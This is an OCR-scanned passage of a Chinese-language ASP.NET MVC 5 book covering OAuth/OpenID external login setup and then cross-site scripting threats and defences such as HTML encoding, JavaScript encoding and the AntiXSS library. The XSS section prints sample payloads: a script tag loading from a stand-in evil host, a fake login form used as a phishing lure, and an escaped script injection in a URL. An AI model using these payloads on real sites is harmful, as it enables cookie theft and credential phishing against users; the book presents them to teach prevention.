应 用 程序 。 这 样 它们 就 会 提供 给 我 们 一 个 客户 端 d 和 一 个 口令 。 我 们 利用 OAuth 提 供 器 根据 这 
些 信息 就 可 以 进行 验证 。 利 用 OpenID( 如 Google 和 Yahoo) 的 网 站 不 需要 注册 应 用 程序 ， 我 们 
也 不 需要 客户 端 d 和 口令 。 

尽管 上 面 罗列 的 OWIN 中 间 件 实用 工具 方法 努力 隐藏 OAuth 和 OpenID 之 间 的 区 别 以 及 提 
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供 器 之 间 的 差异 ， 但 是 我 们 仍 会 注意 一 些 不 同 之 处 。 提 供 器 使 用 的 术语 有 差别 ， 例 如 ， 把 客 
户 端 id 称 为 消费 者 键 、 应 用 程序 id 等 。 幸 运 的 是 ， 对 于 每 个 提供 器 ， 这 些 中 间 件 方法 使 用 的 
参数 名 称 与 提供 器 的 术语 和 文档 一 致 。 


7.5.2 ”配置 OpenID 提 供 器 


由 于 不 用 注册 ， 不 用 填写 参数 ， 因 此 配置 OpenID 提 供 器 是 非常 简单 的 ,ASPNET MVC5 
只 提供 了 一 个 OpenID 中 间 件 实现 ，Google。 如 果 需 要 创建 男 一 个 自 定义 OpenID 提 供 器 ， 建 
议 查看 GoogleAuthenticationMiddleware 实 现 并 遵循 相同 的 模式 。 


注意 遗憾 的 是 ， 目 前 看 来 ，OpenID 明 显 已 经 输 给 了 OAuth。 笔 者 认为 这 很 遗 
R, 因为 OAuth 并 不 是 真正 为 身份 验证 设计 的 ; 其 设计 目的 是 让 网 站 之 间 可 以 共 
享 资源 。 但 是 ， 提 供 器 (Twitter、Facebook、Microsoft Account 等 ) 更 广泛 地 采用 了 
OAuth， 而 不 是 OpenID， 所 以 网 站 和 用 户 也 就 倒 向 了 OAuth 一 边 。 最 后 一 个 主要 
的 独立 OpenID 提 供 器 myOpenID 于 2014 年 2 月 1 日 关闭 。 


实现 支持 Google 提 供 器 的 示例 代码 包含 在 了 Startup.Auth.cs 中 ， 因 此 只 需要 取消 对 它 的 
注释 。 

public partial class Startup 

{ 


public void ConfigureAuth(IAppBuilder app) 

{ 
// Use a cookie to temporarily store information about 
// a user logging in with a third party login provider 


app.UseExternalSignInCookie( 
DefaultAuthenticationTypes.ExternalCookie); 


app.UseGoogleAuthentication(); 

) 

这 样 编写 代码 后 ， 为 了 测试 效果 ， 运 行 应 用 程序 ， 并 在 header 部 分 单 击 Log In 链接 (或 者 
浏览 到 /Account/Login)。 我 们 就 会 看 到 使 用 Google 身 份 验证 的 按钮 显示 在 外 部 网 站 列表 中 ， 
如 图 7-6 所 示 。 

接 下 来 单 击 Google 登 录 按钮 。 这 样 就 把 我 们 重 定向 到 了 Google 认 证 页 面 ， 如 图 7-7 所 示 ， 
该 页 面 验证 我 们 想 要 的 信息 (这 里 是 指 email 地 址 )， 而 后 返回 到 请 求 网 站 。 

单 击 Accept 按 钮 后 ， 我 们 就 会 被 重 定 向 到 ASPNET MVC 网 站 ， 来 继续 完成 注册 程序 (如 
图 7-8)。 

单 击 Register 按 钮 后 ， 我 们 会 被 作为 一 个 已 认定 的 用 户 重 定向 到 主页 。 

编写 本 书 时 ， 新 的 ASPNET Identity 系 统 并 没有 为 认证 后 的 用 户 提供 更 加 详细 的 账户 管 
理 。 这 种 情况 在 将 来 可 能 发 生 改 变 , 因为 ASPNET Identity 2.0(2014 年 春 发 布 ) 包 含 了 更 加 高 级 
的 特性 ， 如 密码 重 置 和 账户 确认 。 从 以 下 网 址 可 以 了 解 ASPNET Identity 的 最 新 信息 : 
http://asp.net/Identity。 
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e > Es Epa 


Log in. 


Use a local account to log in. 


Remember me? 
Login 


"you dont nave a local account 


Use another service to log In. 


Googe 


PETERE 


Google 


Localhost - 
Localhost would like to: 
图 view your emaii adoress 


—— 


Locanost and Google wil use Iis information n accordance wih thev 
respecte terms of sence and pmvacy poses 


TD E 
ry Elide. Donato as 


Register. 


Associate your Google account. 


Association Form 


You've successfully authenticated with Google. Please enter a user name for this site below and click 
the Register button to finish logging in. 


User name 
JonGalloway 


Register 


2014 - My ASP.NET Application 


图 7-8 
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7.5.3 配置 OAuth 提 供 器 


尽管 配置 DAuth 提 供 器 需要 的 代码 和 配置 OpenID 非 常 相 似 ， 但 是 把 网 站 注册 为 应 用 程序 
的 过 程 会 因 提供 器 而 异 。 使 用 Individual User Accounts 身 份 验证 的 MVC 5 项 目 模板 包含 了 对 三 
个 具体 的 OAuth 提 供 器 (Microsoft、Facebook 和 Twittern) 的 支持 ， 以 及 通用 的 OAuth 实 现 。 


注意 与 依赖 于 DotNetOpenAuth NuGet 包 的 MVC 4 实现 不 同 ，MVC 5 的 OAuth 
中 间 件 不 依赖 于 外 部 的 OAuth 实 现 。 


笔者 推荐 采用 ASPNET 网 址 上 配置 OAuth 的 官方 文档 ， 而 不 是 引用 打印 材料 或 博客 。 我 
们 可 以 单 击 链接 在 Startup.Auth.cs( 在 以 “Startup.Auth.cs” 开 头 的 注释 中 ) 或 者 在 下 面 的 位 置 
http://go.microsoft.com/fwlink/?LinkId=301864 中 的 文章 来 找到 它 。 这 些 文档 教 我 们 使 用 OAuth 
提供 器 一 步 一 步 注 册 应 用 程序 ， 并 由 ASPNET 团 队 提 供 支 持 。 

当 注 册 完 成 时 ， 提 供 器 会 提供 一 个 客户 端 d 和 密 钥 ， 并 且 我 们 可 以 把 它们 正确 地 插入 到 
AuthConfig.cs 中 的 注释 方法 。 例 如 ， 假 设 已 经 注册 了 一 个 Facebook 应 用 程序 ， 其 App D» 
123456789012, App Secret 为 “abcdefabcdefdecafbad”( 注 意 这 里 只 是 例子 ， 并 未 投入 使 用 )。 
然后 可 使 用 Startup.Auth.cs 中 的 如 下 代码 启用 Facebook 验 证 : 


public partial class Startup 
{ 


public void ConfigureAuth (IAppBuilder app) 


{ 
// Use a cookie to temporarily store information about 
// a user logging in with a third party login provider 


app.UseExternalSignInCookie( 
DefaultAuthenticationTypes.ExternalCookie); 


app.UseFacebookAuthentication( 
appId: "123456789012", 
appSecret: "abcdefabcdefdecafbad"); 


) 
7.5.44 外 部 登录 的 安全 性 


尽管 OAuth 和 OpenID 简 化 了 安全 性 编码 ， 但 它们 也 给 应 用 程序 引入 了 其 他 潜在 的 攻击 媒 
介 。 如 果 一 个 提供 器 网 站 被 破坏 , 或 者 网 站 之 间 的 安全 通信 遭 到 破坏 ,攻击 者 可 能 会 暗中 破坏 
我 们 网 站 的 登录 ， 或 者 捕获 用 户 信息 。 因 此 ， 当 使 用 代理 验证 时 ， 必 须 重 视 安全 性 问题 。 尽 
管 我 们 使 用 外 部 服务 进行 身份 验证 ， 但 是 网 站 安全 问题 仍然 是 我 们 应 该 负 起 的 责任 。 

1. 可 信 的 外 部 登录 提供 器 


通常 使 用 知名 提供 器 ， 只 支持 我 们 信任 的 提供 器 ， 这 一 点 很 重要 。 下 面 是 两 个 主要 原因 。 
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e. 当 我 们 把 用 户 重 定向 到 外 部 站 点 时 , 我 们 需要 确保 这 些 站 点 不 是 恶意 的 , 没有 安全 问 
题 的 网 站 ， 因 为 那样 的 站 点 可 能 会 泄露 或 误 用 用 户 登录 数据 或 其 他 信息 。 

e 身份 验证 提供 器 向 我 们 提供 用 户 的 信息 ， 这 些 信息 不 仅仅 是 用 户 的 注册 状态 ， 还 有 
e-mail 地 址 和 其 他 提供 器 特定 的 信息 。 尽 管 默认 情况 下 不 会 存储 这 些 额外 的 信息 ， 但 
是 读 取 提供 器 的 数据 (如 emaibD 来 避免 要 求 用 户 重新 输入 这 些 数据 并 不 少见 。 提 供 器 
可 能 会 无 意 或 者 恶意 返回 信息 。 在 存储 提供 器 信息 之 前 将 其 显示 给 用 户 一 般 来 说 是 一 
个 好 主意 。 


2. SX SSL 登录 


从 外 部 提供 器 到 我 们 网 站 的 回调 中 包含 拥有 用 户 信息 的 安全 令 牌 ， 这 些 令 牌 允许 访问 我 
们 的 网 站 。 当 令 牌 在 Internet 中 传递 时 ， 使 用 HTTPS 传 输 是 很 重要 的 ， 因 为 这 样 可 以 防止 信息 

为 访问 AccountController 的 Login Get 方 法 并 执行 HTTPS， 支 持 外 部 登录 的 应 用 程序 应 该 
使 用 RequireHttps 特 性 要 求 使 用 HTTPS 。 


Lr 
// GET: /Account/Login 


[RequireHttps] 
[AllowAnonymous] 
public ActionResult Login(string returnUrl) 
{ 
ViewBag.ReturnUrl = returnUrl; 
return View(); 
) 


在 登录 网 站 期 间 执行 HTTPS 会 导致 对 外 部 提供 器 的 所 有 调用 都 在 HTTPS 上 传输 。 这 反 过 
来 导致 提供 器 使 用 HTTPS 回 调 到 我 们 网 站 。 

此 外 ，Google 验 证 和 HTTPS 一 起 使 用 是 很 重要 的 。Google 会 将 通过 HTTP 登 录 一 次 、 后 来 
通过 HTTPS 又 登录 一 次 的 用 户 报告 为 两 个 不 同 的 用 户 。 要 求 使 用 HTTPS 就 会 避免 这 一 问题 的 
发 生 。 


7.6 Web 应 用 程序 中 的 安全 向 量 


到 目前 为 止 ， 我 们 着 重 介绍 了 如 何 使 用 安全 特性 来 控制 对 网 站 不 同 区 域 的 访问 。 许 多 开 
发 人 员 认 为 , 确保 把 正确 的 用 户 名 和 密码 映射 到 Web 应 用 程序 的 合适 部 分 , 这 就 是 他 们 在 Web 
应 用 程序 安全 性 方面 要 做 的 全 部 工作 。 

然而 ， 本 章 一 开始 就 给 出 警告 ， 指 出 应 用 程序 需要 具有 阻止 用 户 误 用 程序 的 安全 特性 。 
当 Web 应 用 程序 公布 给 公众 用 户 时 ， 尤 其 是 发 布 在 巨大 的 、 匿 名 的 公共 互联 网 中 ， 它 很 容易 
受到 各 种 攻击 。 因 为 Web 应 用 程序 运行 在 标准 的 、 基 于 文本 的 协议 ( 像 HTTP 和 HTML) 之 上 ， 
所 以 它们 也 特别 容易 受到 自动 攻击 的 伤害 。 

因此 ， 下 面 将 介绍 重点 转移 到 安全 威胁 上 来 ， 本 节 主 要 介绍 黑客 如 何 滥用 应 用 程序 ， 以 
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及 针对 这 些 问题 的 应 对 措施 。 
7.6.1 威胁 : 跨 站 脚本 


本 节 首 先 介绍 最 常见 的 攻击 之 一 : 跨 站 脚本 攻击 (XSS)。 本 节 介 绍 了 XSS 的 危害 ， 以 及 如 
何 阻止 跨 站 脚本 攻击 。 


1. 威胁 概述 


我 们 之 前 对 这 种 攻击 没有 防范 ， 然 而 可 能 出 于 幸运 ， 没 有 人 进入 我 们 的 银行 账户 。 即 便 
是 最 热心 的 安全 专家 也 可 能 遗漏 这 一 点 。 跨 站 脚本 攻击 在 Web 安 全 威胁 上 是 排名 第 一 ， 然 而 
遗憾 的 是 ， 导 致 XSS 独 狐 的 主要 原因 是 Web 开 发 人 员 不 熟悉 这 种 攻击 。 

可 以 使 用 下 面 两 种 方法 来 实现 XSS: 一 种 方法 是 通过 用 户 将 恶意 的 脚本 命令 输入 到 网 站 
中 ， 而 这 些 网 站 又 能 够 接收 “不 干净 ”(unsanitized) 用 户 输入 ， 另 一 种 方法 是 通过 直接 在 页 面 
上 显示 的 用 户 输入 。 第 一 种 情况 称 为 “被 动 注入 ”(Passive Injection)。 在 被 动 注入 中 ， 用 户 把 
“不 干净 ”的 内 容 输入 到 文本 框 中 ， 并 把 这 些 内 容 保存 到 数据 库 中 ， 以 后 再 重新 在 页 面 上 显 
示 。 第 二 种 方法 称 为 “主动 注入 ”(Active Injection)， 涉 及 的 用 户 把 “不 干净 ”的 内 容 输入 到 
文本 框 中 ， 这 些 输入 的 内 容 立 刻 就 会 在 屏幕 上 显示 出 来 。 这 两 种 方式 都 会 造成 极 大 危害 ， 下 
首先 介绍 被 动 注入 。 


2. 被 动 注入 


XSS 通 过 向 接收 用 户 输入 的 网 站 中 注入 脚本 代码 来 实现 。 一 个 典型 例子 就 是 博客 ， 它 多 
许 用户 提 交 自 己 的 评论 ， 如 图 7-9 所 示 。 


«-- Is a gravatar Leave a comment.. 


E) Remember your info? 
Subscribe? 


图 7-9 


如 果 有 博客 ， 我 们 就 会 知道 表单 中 通常 会 有 4 个 文本 输入 元 素 : 姓名、e-mail 地 址 、 评 论 和 
URL. 类似 于 这 样 的 表单 会 让 XSS 黑 客 重演 三 扩 ， 理由 有 两 个 -一 首先 ， 他 们 知道 表单 中 提交 的 
输入 内 容 会 在 站 点 上 显示 ; 其 次 ， 他 们 知道 编码 URL 很 麻烦 ， 并 且 开 发 人 员 一 般 会 把 这 些 URL 
作为 锚 标 记 的 一 部 分 ， 所 以 通常 情况 下 开发 人 员 不 会 对 这 些 内 容 进行 必要 检查 。 

可 以 毫 不 夸张 地 讲 ， 黑 客 比 我 们 要 精明 得 多 。 尽 管 他 们 可 能 没有 这 么 聪明 ， 但 是 我 们 不 
妨 这 样 想 一 一 来 增强 我 们 的 防御 警觉 。 

攻击 者 首先 查看 站 点 是 否 对 输入 元 素 上 的 特定 字符 进行 了 编码 。 虽然 对 评论 字段 和 姓名 
字段 采取 了 安全 措施 ， 但 是 URL 字 段 仍然 存在 注入 脚本 的 可 能 性 。 为 了 说 明 这 一 点 ， 我 们 向 
URIL 输 入 元 素 中 输入 任意 一 个 查询 字符 串 ， 如 图 7-10 所 示 。 
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B «— Iis a gravatar Great site! Love the ideas here 


Jon Galloway 
jongalloway@gmail com 
No blog! Sory < 


E Remember your info? E 
Subscribe? 


Submit Comment 


图 7-10 
这 不 是 直接 攻击 ， 只 是 在 URL 中 放 入 了 一 个 “<” 符 号 ; 我 们 想 查看 的 是 这 个 “<” 符 号 
是 不 是 会 被 “&lt;” 替 换 ,“&lt;” 是 HTML 中 “<” 的 替换 字符 。 下 面 提交 评论 ， 结 果 一 切 正 
常 ， 如 图 7-11 所 示 。 


1 Comment 


leave your own 


Jon Galloway said 
December 13, 2013 


Great site! Love the ideas here 
图 7-11 


尽管 这 样 看 起 来 没什么 不 妥 之 处 ， 但 是 这 已 经 向 黑客 暗示 : 注入 脚本 是 可 能 的 ， 这 里 没 
有 针对 输入 URL 的 验证 机 制 ， 来 验证 输入 是 否 有 效 。 如 果 查 看 页 面 的 源 代码 ， 黑 客 们 就 会 前 
生 强 烈 的 XSS 攻 击 想法 ， 因 为 这 里 “一 马 平川 ” 没有 对 攻击 设置 任何 障碍 : 


«a href-"No blog! Sorry :<">Bob</a> 


虽然 这 个 危害 看 起 来 并 不 明显 ， 但 从 黑客 角度 看 却 能 造成 很 大 危害 。 向 URL 字 段 输入 下 
内 容 ， 看 看 会 出 现 什么 情况 : 


"><iframe src-"http://haha.juvenilelamepranks.example.com" height-"400" 
width-500/» 


这 行 脚本 会 关闭 不 受 保护 的 锚 标签 ， 并 同时 强制 网 站 加 载 一 个 FRAME， 如 图 7-12 所 示 。 
如 果 打 算 向 一 个 网 站 发 起 攻击 ， 这 样 做 是 极其 愚蠢 的 ， 因 为 这 样 会 提醒 网 站 管理 员 修补 
漏洞 。 如 果 想 成 为 真正 的 隐形 黑客 ， 就 应 该 像 下 面 这 样 : 


"></a><script src-"http://srizbitrojan.evil.example.com"»«/script» «a href=" 


这 行 脚本 代码 为 了 不 破坏 页 面 流 而 注入 了 一 个 脚本 标签 ， 在 关闭 当前 锚 标 签 的 同时 ， 打 
开 了 另 一 个 锚 标签 。 这 才 是 绝顶 聪明 的 做 法 ， 如 图 7-13 所 示 。 

这 样 一 来 ， 即 使 将 鼠标 指针 县 停 在 名 称 上 面 ， 也 不 会 看 到 注入 的 脚本 标签 一 一 因为 这 是 
一 个 空 的 锚 标 记 ! 当 用 户 访问 网 站 时 ， 这 些 恶 意 的 脚本 将 会 执行 一 些 恶意 操作 ， 比 如 将 用 户 
的 cookies 或 数据 发 送 到 黑客 自己 的 网 站 中 。 
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f 


I 


2 Comments 


You Have Been 
Hacked. Have a 
Nice Day You Not 


1337 Person. All 
Your Files are 
elong To Us N00b 


3. 主动 注入 


主动 XSS 注 入 涉及 用 户 发 送 的 亚 时， 这 些 信 息 并 不 存储 在 数据 库 中 ， 而 是 立即 在 页 
而 上 显示 出 来 。 之 所 以 称 之 为 “主动 ” 主要 是 因为 用 户 直 接 参 与 攻击 一 不 会 傻 坐 在 那里 等 
寺 倒 霉 的 用 户 来 上 钩 。 
有 人 可 能 想 知道 ， 这 些 内 容 是 如 何 构成 攻击 的 呢 ? 用 户 使 用 我 们 的 网 站 作为 涂鸦 墙 ， 随 


意 地 向 他 们 自己 弹出 JavaScript 和 警告 ， 或 者 随意 地 把 他 们 自己 重 定 向 到 恶意 站 点 ， 尽 管 这 些 对 


-用 户 而 言 ， 看 起 来 很 愚蠢 ， 但 是 这 样 做 是 有 绝对 理由 的 。 
下 面 考虑 几乎 所 有 网 站 都 具有 的 “search this site” 功 能 。 如 果 使 用 站 点 搜索 查找 “Active Script 


Injection", 大 部 分 站 点 都 会 返回 一 条 关于 查找 返回 结果 的 消息 ,图 7-14 展 示 了 一 个 来 自 MSDN 
的 查找 页 面 。 


通常 情况 下 , 这 条 消息 不 进行 HTMIL 编码 。 这 里 的 总 体感 觉 就 是 , 如 果 用 户 想 自己 玩 XSS， 


就 随 他 们 。 当 网 站 没有 针对 主动 注入 攻击 建立 防御 时 ,输入 下 面 的 文本 内 容 时 (例如 使 用 搜索 
框 输入 )， 问 题 就 出 现 了 。 


"<br><br>Please login with the form below before proceeding: 

«form action-"mybadsite.aspx"»«table»«tr»«td»Login:«/td»«td» 

«input type-text length-20 name-login»«/td»«/tr» 
«tr»«td»Password:«/td»«td»«input type-text length-20 name-password» 
«/td»«/tr»«/table»«input type=submit value-LOGIN»«/form»" 
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active script injection p 


Results 1-20 of about 113 for: active script injection ED 


How To: Protect From Injection Attacks in ASP.NET Library 

This How To explains how you can validate input to protect your application from injection Rating CO A 
attacks 

msdn.microsoft.com/en-us/library/ff647397 


How to prevent cross-site scripting security issues Support Knowledge Base 
Malicious seript can be embedded within input that is submitted to Web pages and .. This 

article discusses cross-site scripting security issues. the ramifications 

support.microsoft.com/kb/252985. 

How To: Prevent Cross-Site Scripting in ASP.NET Library 

Cross-site scripting (XSS) attacks exploit vulnerabilities in Web page validation by injecting Rating ROO 


client-side seript code. .. Protect From Injection Attacks in ASP.NET. 
‘com/en-us/library/ff649310 


图 7-14 


实际 上 ， 上 面 的 代码 (可 以 将 其 扩充 修改 ， 进 而 与 搜索 页 面 混 合 在 一 起 ) 会 在 搜索 页 面 上 
输出 一 个 登录 表单 ， 并 且 这 个 表单 会 被 提交 到 站 点 外 的 URL。 这 里 创建 了 一 个 网 站 来 演示 这 
一 弱点 (作者 来 自 Acunetix， 构 建 该 站 点 的 目的 是 展示 主动 注入 攻击 的 工作 原理 )， 如 果 将 上 
述 文本 内 容 加 载 到 搜索 表单 中 ， 将 呈现 如 图 7-15 所 示 的 结果 。 


facunetix LOIS 


[about - forums - search - bgn - regster 


图 7-15 


为 了 不 留 痕迹 ， 黑 客 可 能 已 经 在 站 点 的 CSS 和 格式 上 花费 了 大 量 功夫 ， 但 即便 是 像 上 面 
这 样 基本 的 攻击 都 非常 容易 使 人 上 当 。 如 果 用 户 真 在 这 上 面 犯 糊涂 ， 他 们 就 会 向 攻击 的 黑客 
提供 他 们 的 登录 信息 。 

上 述 攻 击 的 基础 知识 是 我 们 的 “ 老 朋 友 ” 一 一 社会 工程 : 

PY 快 来 看 这 个 很 酷 的 站 点 ! 但 你 必须 注册 一 一 我 们 将 保护 你 的 注册 信息 避免 泄露 给 


六 


链接 如 下 : 


«a href-"http://testasp.vulnweb.com/Search.asp?tfSearch-«br»«br»Please 
login 

with the form below before proceeding:«form action-'mybadsite.aspx'»«table» 

«tr»«td»Login:«/td»«td»«input type-text length-20 name-login»«/td»«/tr»«tr» 

«td»Password:«/td»«td»«input type-text length-20 name-password»«/td»«/tr» 

X/table»«input type=submit value-LOGIN»«/form»"»look at this cool site with 

pictures of you from the party!«/a» 


每 天 都 会 有 很 多 人 在 这 个 问题 上 犯 糊涂 。 
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4. 阻止 XSS 
下 面 简要 介绍 如 何在 MVC 应 用 程序 中 阻止 跨 站 脚本 攻击 。 


1) 对 所 有 内 容 进行 HTML 编 码 

大 部 分 情况 下 , 使 用 简单 的 HTML 编 码 就 可 以 避免 XSS 一 一 服务 器 通过 这 个 过 程 将 HTML 
保留 字符 (如 “<” 和 “>”) 替 换 为 “编码 ”。 对 于 ASPNET MVC 而 言 ， 只 需要 在 视图 中 使 用 
Html.Encode 或 Html.AttributeEncode 方 法 就 可 实现 对 特性 值 的 “编码 ”替换 。 

如 果 只 从 本 章 学 到 了 一 个 知识 点 , 那么 一 定 是 : 页 面 上 的 每 一 点 输出 都 应 该 是 经 过 HTML 
编码 或 HIML 特 性 编码 的 。 本 章 前 面 最 早 就 已 经 谈 到 这 一 点 ， 但 是 这 里 再 次 重申 一 下 : 
Html.Encode 是 程序 员 最 好 的 “朋友 ”。 


© 注意 使 用 Web Forms 视 图 引擎 的 视图 在 显示 信息 时 总 是 使 用 HtmlLEncode 方 
法 编码 , ASPNET 4 HTML Encoding Code Block 语 法 使 得 这 一 操作 更 加 简单 ， 例 
如 下 面 的 语句 : 

<% Html.Encode(Model.FirstName) $» 

可 以 变 得 更 加 简洁 : 

«$:Model.FirstName $» 

Razor 视 图 引擎 默认 对 输出 内 容 采用 HITML 编 码 ， 所 以 使 用 : 

GModel.FirstName 

显示 的 模型 属性 将 被 进行 HTML 编码 ， 而 程序 员 不 需要 做 任何 其 他 工作 。 

对 于 已 经 “净化 ”或 来 自信 任 数据 源 (比如 我 们 自己 ) 的 数据 ， 我 们 可 以 
使 用 HTML 辅助 方法 输出 : 

QHtml.Raw(Model.HtmlContent) 

想 了 解 更 多 关于 Html.Encode 和 HTML Encoding Code Blocks 的 内 容 , 请 参阅 
第 3 章 。 


这 里 值得 一 提 的 是 ，ASPNET Web Forms 把 程序 员 引 导 到 了 一 个 使 用 了 服务 器 控制 和 回调 
的 系统 中 ， 这 样 可 以 阻止 大 多 数 的 XSS 攻 击 。 虽 然 不 是 所 有 的 服务 器 控制 都 可 以 防御 XSS 攻 击 
(例如 标签 和 字面 量 )， 但 是 整个 Web Forms 程 序 包 都 倾向 于 把 我 们 推 向 安全 的 方向 。 

ASPNET MVC 提 供 了 更 多 自由 一 一 但 它 也 支持 一 些 开 箱 即 用 的 保护 。 例 如 ， 使 用 
HtmlHelpers 对 HTML 以 及 每 个 标签 的 特性 值 进行 编码 。 

但 是 , 为 了 使 用 ASPNET MVC, 不 一 定 要 使 用 上 述 方法 。 可 以 使 用 替代 的 视图 引擎 手动 
编写 HTMIL 一 一 这 都 取决 于 个 人 ， 而 且 这 也 是 关键 所 在 。 然 而 ， 我 们 需要 在 知道 放弃 了 哪些 
自动 安全 特性 的 基础 上 做 出 决定 。 

2) Html.AttributeEncode 和 Url.Encode 

大 部 分 情况 下 ， 我 们 关注 的 是 页 面 上 的 HTML 输 出 ; 然而 ， 保 护 那 些 在 HTML 中 动态 设 
置 的 特性 也 是 非常 重要 的 。 前 面 最 初 给 出 的 示例 已 经 阐述 了 这 个 问题 ， 它 演示 了 如 何 通 过 向 
作者 的 URL 中 注入 某 种 恶意 代码 来 哄骗 URL。 该 示例 之 所 以 能 够 实现 攻击 ， 是 因为 它 输出 了 
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如 下 所 示 的 锚 标 记 : 
«a href-"«$-Url.Action (AuthorUrl)$»"»«2$-AuthorUrl2$»«/a» 


为 了 合适 地 掩饰 (sanitize) 这 个 链接 ， 必 须 确保 对 预期 的 URL 进 行 编码 。 这 样 就 可 以 用 其 
他 字符 来 蔡 换 URL 中 保留 的 字符 ， 比 如 %20 会 蔡 换 URL 中 的 空格 ("” “") 字 符 。 
此 外 还 有 一 种 情形 ， 即 通过 URL 传 递 用户 在 站 点 某 处 的 输入 值 : 


«a href="<%=Url.Action ("index","home",new (name-ViewData["name"]])$»"»Go 
home</a> 


如 果 遇 到 不 怀 好 意 的 用 户 ， 他 可 能 将 name 值 改 为 : 
"></a><script src-"http://srizbitrojan.evil.example.com"»«/script» «a href=" 


然后 将 其 继续 传递 给 一 个 没有 戒心 的 用 户 。 幸 好 ， 我 们 可 以 使 用 UrlLEncode 或 
Html.AttributeEncode 方 法 编码 URL 中 传递 的 用 户 输入 值 ， 从 而 避免 这 个 威胁 。 


«a href-"«$-Url.Action("index","home",new 
(name-Html.AttributeEncode (ViewData ["name"])))$»"»Click here</a> 


或 者 : 


«a href-"«$-Url.Encode (Url.Action ("index", "home", 
new (name-ViewData["name"]]))$»"»Click here</a> 


谨 记 : 永远 不 要 信任 用 户 能 够 接触 到 或 使 用 的 一 切 数据 ,其 中 包括 所 有 的 表单 值 、URL、 
cookie 或 来 自 第 三 方 源 (如 OpenID) 的 个 人 信息 。 此 外 ， 网 站 所 访问 的 数据 库 或 服务 可 能 没有 
对 这 些 数据 进行 编码 , 所 以 不 要 相信 输入 应 用 程序 的 任何 数据 , 要 尽 可 能 地 对 它们 进行 编码 。 


3) JavaScript 编 码 

只 使 用 HTML 编码 所 有 内 容 是 远 不 够 的 。 事 实 上 ，HTML 编码 并 不 能 阻止 JavaScript 的 执 
行 。 为 了 说 明 这 一 点 ， 下 面 列举 一 个 简单 例子 。 

这 里 假设 ， 我 们 修改 默认 MVC 5 应 用 程序 中 的 HomeController 控 制 器 ， 使 它 接收 一 个 用 
户 名 称 作为 参数 ， 并 把 接收 的 值 添加 到 ViewBag 中 ， 以 便 在 欢迎 消息 中 显示 : 

public ActionResult Index(string UserName) 

i ViewBag.UserName = UserName; 


return View(); 
} 


假设 要 让 网 站 访问 者 关注 这 条 消息 ， 因 此 使 用 了 下 面 的 jQuery 代码 进行 显示 。/Home/ 
Index.cshtml 视 图 更 新 后 的 header 部 分 代码 如 下 所 示 : 


ei 


ViewBag.Title = "Home Page"; 
} 


<div class="jumbotron"> 
<h1>ASP.NET</h1> 
<h2 id="welcome-message"></h2> 
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不 ， 


«/div» 


(section scripts ( 
Qif(ViewBag.UserName !- null) ( 
«script type-"text/javascript"» 
$ (function 0 { 
var msg = 'Welcome, @ViewBag.UserName!'; 
$("fwelcome-message").html (msg).hide().show('slow'); 
); 
</script> 
} 
H 


看 起 来 非常 完美 , 因为 这 里 对 ViewBag 的 值 进行 了 HTML 编码 , 但 这 样 就 绝对 安全 了 吗 ? 
这 样 其 实 并 不 安全 。 下 面 经 HTML 编 码 后 的 URL 仍 然 有 漏洞 ， 如 图 7-16 所 示 。 


http://localhost:1337/?UserName=Jon\x3cscript\x3e%20alert (\x27pwnd\x27)%2 


0\x3c/script\x3e 


怎么 会 这 样 呢 ? 记 住 ， 这 里 只 是 对 其 进行 了 HTML 编码 ， 而 没有 进行 JavaScript 编 码 。 这 


样 就 允许 用 户 在 输入 的 值 中 插入 JavaScript 脚 本 字符 串 ， 随 后 把 这 些 脚本 字符 串 添加 到 文档 对 
象 模型 (Document Object Model，DOM) 中 。 也 就 是 说 ， 黑 客 可 以 利用 十 六 进 制 转 义 码 随意 地 
向 输入 内 容 中 插入 JavaScript 脚 本 代码 。 与 前 面 提 到 的 一 样 ， 要 谨 记 ， 真正 的 黑客 不 会 显示 一 

个 JavaScript 警 告 一 他们 会 做 一 些 那 恶 的 事情 ， 比 如 在 用 户 没 有 丝毫 察觉 的 情况 下 窃取 用 户 


信息 


昌 或 将 用 户 重 定向 到 另 一 个 Web 页 面 等 


1 httg /localhost Nome P - © | | Home Page - My ASP.NET 


ASP.NET 


Welcome, Jon! 


©2014 - My ASP.NET Application 


图 7-16 


这 个 问题 有 两 种 解决 方法 。 一 种 严密 的 方法 是 使 用 Ajax.JavaScriptStringEncode 辅 助 函数 


对 在 JavaScript 中 使 用 的 字符 串 进行 编码 , 与 前 面 介绍 的 使 用 Html.Encode 辅 助 方法 对 HTML 字 


AE 


编码 一 样 。 第 二 种 方法 比较 彻底 ， 使 用 AntiXSS 库 。 


4) 将 AntiXSS 库 作为 ASPNET 的 默认 编码 器 
AntiXSS 库 可 以 为 ASPNET 应 用 程序 增加 一 层 额 外 的 防护 。 它 的 工作 机 制 与 ASPNET 和 


ASPNET MVC 的 编码 函数 相 比 有 几 点 重要 的 差异 ， 但 最 重要 的 是 如 下 两 点 : 
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行 在 .NET 3.5 上 的 版 本 不 能 重 写 默认 的 编码 器 。 


e AnüXSS 使 用 一 个 信任 字符 的 白 名单 ， 而 ASPNET 的 默认 实现 使 用 一 个 有 限 的 不 信 
任 字符 的 黑 名 单 。AntiXSS 只 允许 已 知 安全 的 输入 ， 因 此 它 提供 的 安全 性 能 要 超过 试 
图 阻止 潜在 有 害 输入 的 过 滤器 。 

e AntiXSS 库 的 重点 是 阻止 应 用 程序 中 的 安全 漏洞 ， 而 ASPNET 编码 主要 关注 防止 
HTML 页 面 的 显示 不 被 破坏 。 

.NET 4.5 及 更 高 版 本 包含 Microsoft WPL(Web Protection Library) 的 AntiXSS 编 码 器 。 要 使 

jAntiXSS 库 ， 只 需要 在 web.config 的 httpRuntime 中 添加 如 下 代码 : 
<httpRuntime ... 


encoderType-"System.Web.Security.AntiXss.AntiXssEncoder,System.Web, 
Version-4.0.0.0, Culture-neutral, PublicKeyToken-b03f5f7f11d50a3a" /» 


完成 以 上 步骤 后 ， 当 任何 时 候 调 用 Htmlcode 方 法 或 使 用 HTML 编码 代码 块 <%: %> 时 ， 
AntiXSS 库 就 会 对 其 文本 进行 编码 ， 它 既 进行 HITML 编码 也 进行 JavaScript 编 码 。 

.NET4.5 中 包含 的 AntiXSS 库 内 容 如 下 所 示 : 
HtmlEncode、HtmlFormUrlEncode 和 HtmlAttributeEncode 
XmlAttributeEncode 和 XmlEncode 

e UrlEncode 和 UrlPathEncode 

e CssEncode 

如 果 愿 意 ， 也 可 以 安装 AntiXSS NuGet 包 ,利用 AntiXSS 编 码 器 执行 一 个 高 级 的 JavaScript 
